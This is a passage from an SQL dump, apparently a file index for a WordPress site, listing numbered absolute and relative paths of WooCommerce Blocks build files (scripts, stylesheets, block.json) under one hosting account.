blocks/build/price-filter.asset.php'),(10041,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter.css'),(10042,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-filter.js'),(10043,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-format.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-format.asset.php'),(10044,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-format.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/price-format.js'),(10045,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart--product-average-rating--product-button--product-image--product-price--product---1d132d69.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart--product-average-rating--product-button--product-image--product-price--product---1d132d69.js'),(10046,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart--product-button--product-rating--product-rating-counter--product-rating-stars.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart--product-button--product-rating--product-rating-counter--product-rating-stars.js'),(10047,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart--product-image--product-title.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart--product-image--product-title.js'),(10048,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart-frontend.js'),(10049,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart-rtl.css'),(10050,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart.css'),(10051,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-add-to-cart.js'),(10052,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-average-rating/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-average-rating/block.json'),(10053,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-average-rating--product-button--product-image--product-price--product-rating--product-ratin--e23975b5.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-average-rating--product-button--product-image--product-price--product-rating--product-ratin--e23975b5.js'),(10054,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-average-rating-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-average-rating-frontend.js'),(10055,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-average-rating.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-average-rating.js'),(10056,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-best-sellers/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-best-sellers/block.json'),(10057,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-best-sellers-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-best-sellers-style.asset.php'),(10058,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-best-sellers.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-best-sellers.asset.php'),(10059,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-best-sellers.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-best-sellers.js'),(10060,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button/block.json'),(10061,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button-frontend.js'),(10062,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button-interactivity-frontend.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button-interactivity-frontend.asset.php'),(10063,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button-interactivity-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button-interactivity-frontend.js'),(10064,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button-rtl.css'),(10065,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button.css'),(10066,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-button.js'),(10067,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories/block.json'),(10068,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories-rtl.css'),(10069,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories-style.asset.php'),(10070,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories.asset.php'),(10071,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories.css'),(10072,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories.js'),(10073,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-category/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-category/block.json'),(10074,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-category-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-category-style.asset.php'),(10075,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-category.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-category.asset.php'),(10076,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-category.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-category.js'),(10077,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-collection/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-collection/block.json'),(10078,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-collection-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-collection-style.asset.php'),(10079,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-collection.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-collection.asset.php'),(10080,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-collection.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-collection.js'),(10081,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-details/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-details/block.json'),(10082,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-details-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-details-rtl.css'),(10083,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-details-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-details-style.asset.php'),(10084,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-details.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-details.css'),(10085,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery/block.json'),(10086,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-frontend.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-frontend.asset.php'),(10087,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-frontend.js'),(10088,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image/block.json'),(10089,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-frontend.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-frontend.asset.php'),(10090,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-frontend.js'),(10091,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous/block.json'),(10092,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous-rtl.css'),(10093,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous-style.asset.php'),(10094,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous.asset.php'),(10095,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous.css'),(10096,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous.js'),(10097,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-rtl.css'),(10098,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-style.asset.php'),(10099,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image.asset.php'),(10100,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image.css'),(10101,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image.js'),(10102,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager/block.json'),(10103,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager-rtl.css'),(10104,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager-style.asset.php'),(10105,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.asset.php'),(10106,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.css'),(10107,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.js'),(10108,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-rtl.css'),(10109,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-style.asset.php'),(10110,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails/block.json'),(10111,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails-rtl.css'),(10112,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails-style.asset.php'),(10113,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails.asset.php'),(10114,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails.css'),(10115,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-thumbnails.js'),(10116,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery.asset.php'),(10117,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery.css'),(10118,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery.js'),(10119,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-frontend.js'),(10120,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-gallery/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-gallery/block.json'),(10121,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-gallery-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-gallery-rtl.css'),(10122,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-gallery-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-gallery-style.asset.php'),(10123,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-gallery.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-gallery.css'),(10124,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image-rtl.css'),(10125,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image.css'),(10126,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-image.js'),(10127,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-meta/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-meta/block.json'),(10128,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new/block.json'),(10129,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new-style.asset.php'),(10130,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new.asset.php'),(10131,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new.js'),(10132,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale-style.asset.php'),(10133,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale.asset.php'),(10134,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale.js'),(10135,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price-frontend.js'),(10136,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price-rtl.css'),(10137,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price.css'),(10138,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price.js'),(10139,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query-rtl.css'),(10140,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query-style.asset.php'),(10141,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.asset.php'),(10142,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.css'),(10143,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.js'),(10144,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating/block.json'),(10145,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-counter/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-counter/block.json'),(10146,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-counter-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-counter-frontend.js'),(10147,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-counter.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-counter.js'),(10148,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-frontend.js'),(10149,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-rtl.css'),(10150,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars/block.json'),(10151,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars-frontend.js'),(10152,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars-rtl.css'),(10153,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars.css'),(10154,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars.js'),(10155,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating.css'),(10156,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating.js'),(10157,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count/block.json'),(10158,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count-rtl.css'),(10159,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count-style.asset.php'),(10160,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count.asset.php'),(10161,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count.css'),(10162,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count.js'),(10163,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-reviews/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-reviews/block.json'),(10164,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-reviews-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-reviews-rtl.css'),(10165,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-reviews-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-reviews-style.asset.php'),(10166,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-reviews.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-reviews.css'),(10167,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge-frontend.js'),(10168,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge-rtl.css'),(10169,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge.css'),(10170,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge.js'),(10171,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-search-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-search-rtl.css'),(10172,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-search-style.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-search-style.asset.php'),(10173,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-search.asset.php','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-search.asset.php'),(10174,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-search.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-search.css'),(10175,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-search.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-search.js'),(10176,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sku-frontend.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sku-frontend.js'),(10177,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sku-rtl.css','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sku-rtl.css'),(10178,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sku.css','wp-content/plugins/woocommerce/packages/wooc